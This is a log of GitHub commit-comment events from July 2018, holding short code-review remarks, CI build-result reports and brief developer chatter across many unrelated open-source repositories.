{"id":"8022954940","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29844530,"position":null,"line":null,"path":null,"commit_id":"6d3facc741cab8cd093a7affcddacee8abb6832d","created_at":"2018-07-26T14:07:40Z","updated_at":"2018-07-26T14:07:40Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T14:07:40Z"}
{"id":"8022955129","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29844531,"position":15,"line":27,"path":"src/otrng_parse.c","commit_id":"dde5316e0930b265dce21435c7b98245b121dc1f","created_at":"2018-07-26T14:07:43Z","updated_at":"2018-07-26T14:07:43Z","author_association":"MEMBER","body":"Mmm.. but the idea of a parsing function is not to assign new things, but rather to show the message as it is, in a \"more\" readable way.. not human readable way."}},"created_at":"2018-07-26T14:07:43Z"}
{"id":"8022955745","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844532,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T14:07:48Z","updated_at":"2018-07-26T14:07:48Z","author_association":"NONE","body":"Hang on, I've just realised: will this only be used in output routines, and not in the ordinary flow of reaching the fixpoint? If so then I withdraw my objection."}},"created_at":"2018-07-26T14:07:48Z"}
{"id":"8022959000","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29844541,"position":null,"line":null,"path":null,"commit_id":"6d3facc741cab8cd093a7affcddacee8abb6832d","created_at":"2018-07-26T14:08:19Z","updated_at":"2018-07-26T14:08:19Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2948 of 2948 tests passed, 85 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 77 tests had: EIO diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T14:08:19Z"}
{"id":"8022971633","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844563,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T14:10:22Z","updated_at":"2018-07-26T14:10:22Z","author_association":"OWNER","body":"Yep; is output only, so that we can query / display things per program point.  Your objections are both sane and valid but I fear this is the currently best solution."}},"created_at":"2018-07-26T14:10:22Z"}
{"id":"8022980669","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29844576,"position":34,"line":13,"path":"1/right_triangle.rb","commit_id":"cf19dbc0d2a4cc3b13c65f6271543e2a9e3913ba","created_at":"2018-07-26T14:11:43Z","updated_at":"2018-07-26T14:11:43Z","author_association":"NONE","body":"Тут мы рекомендуем решать без вложенных ифов. Тут можно скомбинировать условия. И вычисление Пифагора можно вынести в переменную, которая будет возвращать булево значение и здесь ее уже подставлять в условиях."}},"created_at":"2018-07-26T14:11:43Z"}
{"id":"8022983146","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29844579,"position":34,"line":13,"path":"1/right_triangle.rb","commit_id":"cf19dbc0d2a4cc3b13c65f6271543e2a9e3913ba","created_at":"2018-07-26T14:12:06Z","updated_at":"2018-07-26T14:12:06Z","author_association":"NONE","body":"На нашел проверки на равносторонность"}},"created_at":"2018-07-26T14:12:06Z"}
{"id":"8022985671","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844584,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T14:12:29Z","updated_at":"2018-07-26T14:12:29Z","author_association":"NONE","body":"OK, in that case just stick a health warning on it noting that if you introduce this into the standard `ait::visit` routine you'll regret it"}},"created_at":"2018-07-26T14:12:29Z"}
{"id":"8022994992","type":"CommitCommentEvent","actor":{"login":"gilamsalem"},"repo":{"name":"mozilla/DeepSpeech"},"payload":{"comment":{"id":29844602,"position":5,"line":18,"path":"README.md","commit_id":"646c9178cf38e97467a279c9ff00c4d354a37a59","created_at":"2018-07-26T14:13:57Z","updated_at":"2018-07-26T14:13:57Z","author_association":"NONE","body":"I installed deepspeech today, and it seems that currently it doesn't support non positional argument.\r\nThe following command returns an error."}},"created_at":"2018-07-26T14:13:57Z"}
{"id":"8022999347","type":"CommitCommentEvent","actor":{"login":"jabranham"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29844605,"position":null,"line":null,"path":null,"commit_id":"d6d2604364c176234f3391ffa3ff800cc63f27a8","created_at":"2018-07-26T14:14:36Z","updated_at":"2018-07-26T14:14:36Z","author_association":"CONTRIBUTOR","body":"`caddr` is in cl.el up to Emacs 26. Emacs 25 and 24 have `cl-caddr` defined in cl-lib, and in Emacs 26 cl-caddr is aliased to caddr in subr.el. So we could use that, I suppose. "}},"created_at":"2018-07-26T14:14:36Z"}
{"id":"8023002589","type":"CommitCommentEvent","actor":{"login":"aleb"},"repo":{"name":"thiblahute/gst-editing-services"},"payload":{"comment":{"id":29844613,"position":29,"line":171,"path":"ges/ges-base-xml-formatter.c","commit_id":"27b7ea0bfdc7ac4367e570d7320a427f989e5295","created_at":"2018-07-26T14:15:08Z","updated_at":"2018-07-26T14:15:08Z","author_association":"NONE","body":"I think this is not enough if there are multiple levels of proxying. Would it be simpler to just discover all the assets, and when everything is ready keep iterating the list of wanted assets and load the ones with no proxy or with the proxy already loaded? "}},"created_at":"2018-07-26T14:15:08Z"}
{"id":"8023012276","type":"CommitCommentEvent","actor":{"login":"AnjuMeleth"},"repo":{"name":"AnjuMeleth/OnlineClass"},"payload":{"comment":{"id":29844629,"position":null,"line":null,"path":null,"commit_id":"c62c624a9214232ce2235133139a9c9187071b8b","created_at":"2018-07-26T14:16:32Z","updated_at":"2018-07-26T14:16:32Z","author_association":"OWNER","body":"Comitted  on july 26th"}},"created_at":"2018-07-26T14:16:32Z"}
{"id":"8023014420","type":"CommitCommentEvent","actor":{"login":"MarBaka"},"repo":{"name":"Rilu-Ril/TestRepoDevcit"},"payload":{"comment":{"id":29844637,"position":null,"line":null,"path":null,"commit_id":"304781d5b5a6485f3fa7c6187e9e211c459c74fe","created_at":"2018-07-26T14:16:52Z","updated_at":"2018-07-26T14:16:52Z","author_association":"COLLABORATOR","body":"what is this\r\n"}},"created_at":"2018-07-26T14:16:52Z"}
{"id":"8023015417","type":"CommitCommentEvent","actor":{"login":"dedepete"},"repo":{"name":"k0shk0sh/FastHub"},"payload":{"comment":{"id":29844638,"position":5,"line":57,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"b6520c903c538d3ecbdb0232dd688304d067e7fa","created_at":"2018-07-26T14:17:01Z","updated_at":"2018-07-26T14:17:01Z","author_association":"COLLABORATOR","body":"Non-empty field would cause spelling issues in some cases.  \n_\"Opened by\" in the screenshot below._  \n![](https://i.imgur.com/L6kFpkc.jpg) \n\n_Sent from my P2 using [FastHub](https://play.google.com/store/apps/details?id=com.fastaccess.github)_"}},"created_at":"2018-07-26T14:17:01Z"}
{"id":"8023016256","type":"CommitCommentEvent","actor":{"login":"traherom"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29844644,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T14:17:09Z","updated_at":"2018-07-26T14:17:09Z","author_association":"NONE","body":"This may be me not understanding something about NPM, but it looks like this patch is marked as 1.1.1 and I see NPM has 1.1.1 uploaded, but the code pulled from NPM still has the old callOne with no return.\r\n\r\nMaybe a mixup of the master and develop branches?"}},"created_at":"2018-07-26T14:17:09Z"}
{"id":"8023023421","type":"CommitCommentEvent","actor":{"login":"lissyx"},"repo":{"name":"mozilla/DeepSpeech"},"payload":{"comment":{"id":29844653,"position":5,"line":18,"path":"README.md","commit_id":"646c9178cf38e97467a279c9ff00c4d354a37a59","created_at":"2018-07-26T14:18:13Z","updated_at":"2018-07-26T14:18:13Z","author_association":"COLLABORATOR","body":"@gilamsalem And yet it does. Check the version installed."}},"created_at":"2018-07-26T14:18:13Z"}
{"id":"8023036165","type":"CommitCommentEvent","actor":{"login":"bengor62"},"repo":{"name":"bengor62/Practica1IPC2"},"payload":{"comment":{"id":29844668,"position":null,"line":null,"path":null,"commit_id":"e9b9bdb1496ca3cb11f1235eeab31b2f4d8550b8","created_at":"2018-07-26T14:20:14Z","updated_at":"2018-07-26T14:20:14Z","author_association":"OWNER","body":"Calidad "}},"created_at":"2018-07-26T14:20:14Z"}
{"id":"8023042759","type":"CommitCommentEvent","actor":{"login":"Sphar-io"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29844672,"position":38,"line":38,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-26T14:21:17Z","updated_at":"2018-07-26T14:21:17Z","author_association":"OWNER","body":"Changed all `try{}` to `throws`"}},"created_at":"2018-07-26T14:21:17Z"}
{"id":"8023044894","type":"CommitCommentEvent","actor":{"login":"jameyboor"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29844675,"position":null,"line":null,"path":null,"commit_id":"3760a38b7e37c23a944d2c4fdec9028ae5ebde3a","created_at":"2018-07-26T14:21:37Z","updated_at":"2018-07-26T14:21:37Z","author_association":"NONE","body":"I love how you're still going strong with the emoji's."}},"created_at":"2018-07-26T14:21:37Z"}
{"id":"8023045591","type":"CommitCommentEvent","actor":{"login":"eLBati"},"repo":{"name":"OCA/l10n-italy"},"payload":{"comment":{"id":29844677,"position":9,"line":95,"path":"l10n_it_reverse_charge/models/account_invoice.py","commit_id":"c4f38f45465acd2866327a6f3087a0ef98e6b03a","created_at":"2018-07-26T14:21:44Z","updated_at":"2018-07-26T14:21:44Z","author_association":"MEMBER","body":"@SimoRubi manca considerare eventuale sconto (```price_unit = line.price_unit * (1 - (line.discount or 0.0) / 100.0)```)"}},"created_at":"2018-07-26T14:21:44Z"}
{"id":"8023047921","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"BioContainers/containers"},"payload":{"comment":{"id":29844682,"position":null,"line":null,"path":null,"commit_id":"723c2865f8249822c5f21ce730c7344950cd7cf5","created_at":"2018-07-26T14:22:07Z","updated_at":"2018-07-26T14:22:07Z","author_association":"CONTRIBUTOR","body":"No biocontainers/debian-stretch-backports/test-cmds.txt (test file) present, skipping tests"}},"created_at":"2018-07-26T14:22:07Z"}
{"id":"8023056670","type":"CommitCommentEvent","actor":{"login":"maizhigang"},"repo":{"name":"maizhigang/gitskills"},"payload":{"comment":{"id":29844698,"position":null,"line":null,"path":null,"commit_id":"923d910818c9fba77042560165d9c48744877b89","created_at":"2018-07-26T14:23:31Z","updated_at":"2018-07-26T14:23:31Z","author_association":"OWNER","body":"fix env conflict"}},"created_at":"2018-07-26T14:23:31Z"}
{"id":"8023102586","type":"CommitCommentEvent","actor":{"login":"DerpySoccerBall"},"repo":{"name":"DerpySoccerBall/oaa"},"payload":{"comment":{"id":29844791,"position":null,"line":null,"path":null,"commit_id":"6d41ebf0cdc6de50ec1c8b5021c82d9691c9a259","created_at":"2018-07-26T14:30:44Z","updated_at":"2018-07-26T14:30:44Z","author_association":"OWNER","body":"Balance"}},"created_at":"2018-07-26T14:30:44Z"}
{"id":"8023104867","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":29844795,"position":37,"line":37,"path":"testplugins/src/main/java/org/spongepowered/test/VillagerGriefTest.java","commit_id":"502af5003b1c90eddf41f67ed83f67c2c2d0c146","created_at":"2018-07-26T14:31:04Z","updated_at":"2018-07-26T14:31:04Z","author_association":"MEMBER","body":"This needs a toggle to turn off an on."}},"created_at":"2018-07-26T14:31:04Z"}
{"id":"8023105361","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"nabla-c0d3/sslyze"},"payload":{"comment":{"id":29844797,"position":18,"line":464,"path":"sslyze/plugins/certificate_info_plugin.py","commit_id":"fa32ee143ef8e04ac86e97c2f698e19e062a2c97","created_at":"2018-07-26T14:31:10Z","updated_at":"2018-07-26T14:31:10Z","author_association":"NONE","body":"@stefanb I suggest to open a separate issue about your request. This source code comment functionality is not very practical at github and can be overlooked easily. "}},"created_at":"2018-07-26T14:31:10Z"}
{"id":"8023112407","type":"CommitCommentEvent","actor":{"login":"IBRA1984"},"repo":{"name":"PremiumIPTVSolutions/PremiumIPTVSolutions"},"payload":{"comment":{"id":29844813,"position":null,"line":null,"path":null,"commit_id":"bee3b5df512ed81eb19beecdc4979623eaaf40b6","created_at":"2018-07-26T14:32:17Z","updated_at":"2018-07-26T14:32:17Z","author_association":"NONE","body":"Thank you bro👍"}},"created_at":"2018-07-26T14:32:17Z"}
{"id":"8023113312","type":"CommitCommentEvent","actor":{"login":"jannesbrunner"},"repo":{"name":"jannesbrunner/Angular-PhotoBlog"},"payload":{"comment":{"id":29844817,"position":1,"line":1,"path":"src/app/entries/entry/entry-comment-form.component.html","commit_id":"c4398956806e76c9d11e54c3aeff383ffa5abbe0","created_at":"2018-07-26T14:32:25Z","updated_at":"2018-07-26T14:32:25Z","author_association":"OWNER","body":"`onSubmit()` function in `entry-form.component.ts` gets referenced here."}},"created_at":"2018-07-26T14:32:25Z"}
{"id":"8023117021","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29844823,"position":11,"line":15,"path":"README.md","commit_id":"68545aec347a05ce519bbfe73fa3e11a59212557","created_at":"2018-07-26T14:33:01Z","updated_at":"2018-07-26T14:33:01Z","author_association":"OWNER","body":"Check for 4c1c347f7aeea5fc87e9fb1678fe4fe59e51c4bf"}},"created_at":"2018-07-26T14:33:01Z"}
{"id":"8023119865","type":"CommitCommentEvent","actor":{"login":"jannesbrunner"},"repo":{"name":"jannesbrunner/Angular-PhotoBlog"},"payload":{"comment":{"id":29844837,"position":5,"line":16,"path":"src/app/entries/entry/entry.component.html","commit_id":"c4398956806e76c9d11e54c3aeff383ffa5abbe0","created_at":"2018-07-26T14:33:29Z","updated_at":"2018-07-26T14:33:29Z","author_association":"OWNER","body":"**important!**"}},"created_at":"2018-07-26T14:33:29Z"}
{"id":"8023126737","type":"CommitCommentEvent","actor":{"login":"cevegaju"},"repo":{"name":"Franki94/Belatrix_Clean_Code"},"payload":{"comment":{"id":29844853,"position":8,"line":10,"path":"SOLID/01 SingleResponsability/Sample.cs","commit_id":"ec72c2cd4c909198e025167e39102b8677f7be1c","created_at":"2018-07-26T14:34:32Z","updated_at":"2018-07-26T14:34:32Z","author_association":"NONE","body":"This line is another method."}},"created_at":"2018-07-26T14:34:32Z"}
{"id":"8023128288","type":"CommitCommentEvent","actor":{"login":"IBRA1984"},"repo":{"name":"PremiumIPTVSolutions/PremiumIPTVSolutions"},"payload":{"comment":{"id":29844856,"position":1,"line":1,"path":"README.md","commit_id":"fe29139240a8c242912653ef5dfe5785380aa40b","created_at":"2018-07-26T14:34:44Z","updated_at":"2018-07-26T14:34:44Z","author_association":"NONE","body":"Merci tro cool😉"}},"created_at":"2018-07-26T14:34:44Z"}
{"id":"8023130903","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29844865,"position":null,"line":null,"path":null,"commit_id":"6f01df39aa9ca1585a37aebc8496314722057ac2","created_at":"2018-07-26T14:35:11Z","updated_at":"2018-07-26T14:35:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [change objects to the objects of the API response to update \"update time\".](https://trello.com/c/G8HFMp2Z/53-change-objects-to-the-objects-of-the-api-response-to-update-update-time)"}},"created_at":"2018-07-26T14:35:11Z"}
{"id":"8023131857","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29844866,"position":null,"line":null,"path":null,"commit_id":"8048a4826fca7de366d187e4866934197e513e26","created_at":"2018-07-26T14:35:19Z","updated_at":"2018-07-26T14:35:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [change objects to the objects of the API response to update \"update time\".](https://trello.com/c/G8HFMp2Z/53-change-objects-to-the-objects-of-the-api-response-to-update-update-time)"}},"created_at":"2018-07-26T14:35:19Z"}
{"id":"8023132115","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29844868,"position":null,"line":null,"path":null,"commit_id":"5558ad01fbf26a8d40bc86f6b53dd030064c724e","created_at":"2018-07-26T14:35:22Z","updated_at":"2018-07-26T14:35:22Z","author_association":"CONTRIBUTOR","body":"The `%{_bindir}` in rpmbuild is `/usr/bin`.\r\nWhen I saw your `configure` it was `/usr/local/bin`.\r\nThis is the link to the default macros in rpmbuild.\r\nhttps://fedoraproject.org/wiki/Packaging:RPMMacros\r\nI do not mind using `%{_bindir}` for the spec file."}},"created_at":"2018-07-26T14:35:22Z"}
{"id":"8023132426","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29844869,"position":null,"line":null,"path":null,"commit_id":"cac697b0824b51fbf9ae0e7e106385de7ea79ff1","created_at":"2018-07-26T14:35:24Z","updated_at":"2018-07-26T14:35:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [change objects to the objects of the API response to update \"update time\".](https://trello.com/c/G8HFMp2Z/53-change-objects-to-the-objects-of-the-api-response-to-update-update-time)"}},"created_at":"2018-07-26T14:35:24Z"}
{"id":"8023132954","type":"CommitCommentEvent","actor":{"login":"qianduan7"},"repo":{"name":"mipengine/mip2-extensions-platform"},"payload":{"comment":{"id":29844871,"position":null,"line":null,"path":null,"commit_id":"b7c37767da5749c544150162de0a8ba8d8a0706a","created_at":"2018-07-26T14:35:29Z","updated_at":"2018-07-26T14:35:29Z","author_association":"NONE","body":"保险审核"}},"created_at":"2018-07-26T14:35:29Z"}
{"id":"8023141201","type":"CommitCommentEvent","actor":{"login":"njantony"},"repo":{"name":"njantony/TestRepo"},"payload":{"comment":{"id":29844878,"position":null,"line":null,"path":null,"commit_id":"45d0f48037d26b7a93b0121290de0e35d8563175","created_at":"2018-07-26T14:36:47Z","updated_at":"2018-07-26T14:36:47Z","author_association":"OWNER","body":"Created a branch"}},"created_at":"2018-07-26T14:36:47Z"}
{"id":"8023142227","type":"CommitCommentEvent","actor":{"login":"dogiex"},"repo":{"name":"dogiex/MIUI-XML-10-FINNISH"},"payload":{"comment":{"id":29844880,"position":null,"line":null,"path":null,"commit_id":"3bb5866b8e13584dd432fda50d44e366296e6aa0","created_at":"2018-07-26T14:36:58Z","updated_at":"2018-07-26T14:36:58Z","author_association":"OWNER","body":"Done! :)"}},"created_at":"2018-07-26T14:36:58Z"}
{"id":"8023142737","type":"CommitCommentEvent","actor":{"login":"AlexiCauvin"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29844883,"position":27,"line":82,"path":"frontend_lib/src/component/Timeline/Timeline.styl","commit_id":"0e03339cfad6e97da61541bafba24ea72614c3fc","created_at":"2018-07-26T14:37:02Z","updated_at":"2018-07-26T14:37:02Z","author_association":"COLLABORATOR","body":"spaces between button version and date's version"}},"created_at":"2018-07-26T14:37:02Z"}
{"id":"8023145546","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29844889,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-26T14:37:29Z","updated_at":"2018-07-26T14:37:29Z","author_association":"NONE","body":"С чего ты решил, что ```myPrintln()``` лежит в классе ```MySystem```?\r\n\r\nНет, экземпляр класса и объект — это одно и тоже. Объект является экземпляром класса. Экземпляром класса является объект. Говорят либо «Объект ```барбос``` типа ```Собака```», либо «```барбос``` — экземпляр класса ```Собака```»"}},"created_at":"2018-07-26T14:37:29Z"}
{"id":"8023146255","type":"CommitCommentEvent","actor":{"login":"IBRA1984"},"repo":{"name":"PremiumIPTVSolutions/PremiumIPTVSolutions"},"payload":{"comment":{"id":29844891,"position":null,"line":null,"path":null,"commit_id":"bee3b5df512ed81eb19beecdc4979623eaaf40b6","created_at":"2018-07-26T14:37:36Z","updated_at":"2018-07-26T14:37:36Z","author_association":"NONE","body":"Super 🤘"}},"created_at":"2018-07-26T14:37:36Z"}
{"id":"8023147025","type":"CommitCommentEvent","actor":{"login":"sivaramaaa"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":29844893,"position":null,"line":null,"path":null,"commit_id":"911f22149a5793cb90779e30bd29694dbbd2af11","created_at":"2018-07-26T14:37:43Z","updated_at":"2018-07-26T14:37:43Z","author_association":"COLLABORATOR","body":"yup sure , will check !"}},"created_at":"2018-07-26T14:37:43Z"}
{"id":"8023147712","type":"CommitCommentEvent","actor":{"login":"AlexiCauvin"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29844894,"position":3,"line":11,"path":"frontend_lib/src/component/Timeline/Timeline.styl","commit_id":"0e03339cfad6e97da61541bafba24ea72614c3fc","created_at":"2018-07-26T14:37:49Z","updated_at":"2018-07-26T14:37:49Z","author_association":"COLLABORATOR","body":"improve visual of timeline's header"}},"created_at":"2018-07-26T14:37:49Z"}
{"id":"8023150466","type":"CommitCommentEvent","actor":{"login":"AlexiCauvin"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29844899,"position":22,"line":82,"path":"frontend_lib/src/component/Timeline/Timeline.jsx","commit_id":"0e03339cfad6e97da61541bafba24ea72614c3fc","created_at":"2018-07-26T14:38:15Z","updated_at":"2018-07-26T14:38:15Z","author_association":"COLLABORATOR","body":"change the placeholder of the timeline"}},"created_at":"2018-07-26T14:38:15Z"}
{"id":"8023152129","type":"CommitCommentEvent","actor":{"login":"AlexiCauvin"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29844910,"position":5,"line":37,"path":"frontend_lib/src/component/Timeline/Timeline.jsx","commit_id":"0e03339cfad6e97da61541bafba24ea72614c3fc","created_at":"2018-07-26T14:38:30Z","updated_at":"2018-07-26T14:38:30Z","author_association":"COLLABORATOR","body":"improve visual of timeline's header"}},"created_at":"2018-07-26T14:38:30Z"}
{"id":"8023154853","type":"CommitCommentEvent","actor":{"login":"AlexiCauvin"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29844919,"position":5,"line":9,"path":"frontend/src/component/Account/Timezone.jsx","commit_id":"a6e60fe6601bb42da425177a17d1da4a335e18d9","created_at":"2018-07-26T14:38:55Z","updated_at":"2018-07-26T14:38:55Z","author_association":"COLLABORATOR","body":"improve the class name\r\n"}},"created_at":"2018-07-26T14:38:55Z"}
{"id":"8023155978","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29844921,"position":34,"line":1633,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"3008ba7a18bf1ae12243dcf5124a111a5c6275de","created_at":"2018-07-26T14:39:07Z","updated_at":"2018-07-26T14:39:07Z","author_association":"COLLABORATOR","body":"This kinda feels like a determiner but I am not sure 🤔"}},"created_at":"2018-07-26T14:39:07Z"}
{"id":"8023169181","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29844942,"position":null,"line":null,"path":null,"commit_id":"283f2653aa3747d48e4a72f2cbb84291ffb167bb","created_at":"2018-07-26T14:41:02Z","updated_at":"2018-07-26T14:41:02Z","author_association":"CONTRIBUTOR","body":"oh ja, sehr wichtiger bugfix du hurensohn"}},"created_at":"2018-07-26T14:41:02Z"}
{"id":"8023169236","type":"CommitCommentEvent","actor":{"login":"jannesbrunner"},"repo":{"name":"jannesbrunner/Angular-PhotoBlog"},"payload":{"comment":{"id":29844943,"position":2,"line":1,"path":"src/app/entries/entry/entry-comment-form.component.html","commit_id":"05fb83497d89778247b7094b4aa4a9d0381ef06b","created_at":"2018-07-26T14:41:02Z","updated_at":"2018-07-26T14:41:02Z","author_association":"OWNER","body":"Creating local variable in HTML Markup"}},"created_at":"2018-07-26T14:41:02Z"}
{"id":"8023174164","type":"CommitCommentEvent","actor":{"login":"nlohmann"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29844957,"position":null,"line":null,"path":null,"commit_id":"3760a38b7e37c23a944d2c4fdec9028ae5ebde3a","created_at":"2018-07-26T14:41:47Z","updated_at":"2018-07-26T14:41:47Z","author_association":"OWNER","body":"I also convinced my colleagues at work to use Gitmoji for their projects ;-)"}},"created_at":"2018-07-26T14:41:47Z"}
{"id":"8023179545","type":"CommitCommentEvent","actor":{"login":"HarryUK"},"repo":{"name":"iAuspicious/iauspicious.github.io"},"payload":{"comment":{"id":29844963,"position":null,"line":null,"path":null,"commit_id":"0ec1d83118878a4118f9f55c482a493cddae00f0","created_at":"2018-07-26T14:42:37Z","updated_at":"2018-07-26T14:42:37Z","author_association":"CONTRIBUTOR","body":"Well somehow these mismatch still so kms"}},"created_at":"2018-07-26T14:42:37Z"}
{"id":"8023184333","type":"CommitCommentEvent","actor":{"login":"nafiesl"},"repo":{"name":"nafiesl/free-pmo"},"payload":{"comment":{"id":29844977,"position":null,"line":null,"path":null,"commit_id":"8ba3e9f79327d88770dd1dffa9dd10a96c7277d8","created_at":"2018-07-26T14:43:19Z","updated_at":"2018-07-26T14:43:19Z","author_association":"OWNER","body":"This commit contains change on `invoices` table migration, for existing Free-PMO users, please use this sql command to update your `invoices` table.\r\n\r\n> **Remember :** please backup your database before run the commands.\r\n\r\n```\r\nALTER TABLE `invoices`\r\n\tADD COLUMN `discount` INT(10) UNSIGNED NULL DEFAULT NULL AFTER `amount`,\r\n\tADD COLUMN `discount_notes` VARCHAR(255) NULL DEFAULT NULL AFTER `discount`;\r\n```\r\n\r\nThanks."}},"created_at":"2018-07-26T14:43:19Z"}
{"id":"8023192728","type":"CommitCommentEvent","actor":{"login":"samanthagatt"},"repo":{"name":"samanthagatt/Poll"},"payload":{"comment":{"id":29844991,"position":null,"line":null,"path":null,"commit_id":"bc66fdda9be87086c518e0a23e8f59a657bbb1dd","created_at":"2018-07-26T14:44:36Z","updated_at":"2018-07-26T14:44:36Z","author_association":"OWNER","body":"This commit also adds Voting, Results, and Combined storyboards as items in the tab bar controller"}},"created_at":"2018-07-26T14:44:36Z"}
{"id":"8023203211","type":"CommitCommentEvent","actor":{"login":"samanthagatt"},"repo":{"name":"samanthagatt/Poll"},"payload":{"comment":{"id":29845015,"position":null,"line":null,"path":null,"commit_id":"898fd0cb8725e0ef60a37c4281d4695aaa8c72e4","created_at":"2018-07-26T14:46:10Z","updated_at":"2018-07-26T14:46:10Z","author_association":"OWNER","body":"This commit actually creates a table view controller not a regular view controller."}},"created_at":"2018-07-26T14:46:10Z"}
{"id":"8023204009","type":"CommitCommentEvent","actor":{"login":"stefanb"},"repo":{"name":"nabla-c0d3/sslyze"},"payload":{"comment":{"id":29845018,"position":18,"line":464,"path":"sslyze/plugins/certificate_info_plugin.py","commit_id":"fa32ee143ef8e04ac86e97c2f698e19e062a2c97","created_at":"2018-07-26T14:46:16Z","updated_at":"2018-07-26T14:46:16Z","author_association":"NONE","body":"Reported #323"}},"created_at":"2018-07-26T14:46:16Z"}
{"id":"8023204417","type":"CommitCommentEvent","actor":{"login":"mmohring"},"repo":{"name":"coolo/open-build-service"},"payload":{"comment":{"id":29845020,"position":null,"line":null,"path":null,"commit_id":"f2016a5f3720e8ce54115df5f433017a08189148","created_at":"2018-07-26T14:46:20Z","updated_at":"2018-07-26T14:46:20Z","author_association":"NONE","body":"Hi, I have applied this fix now. Works here, clockwork now starting. @coolo is there a way to query the hard coded path /usr/lib64/obs-api/ruby/2.5.0/bin/clockworkd from ruby ?"}},"created_at":"2018-07-26T14:46:20Z"}
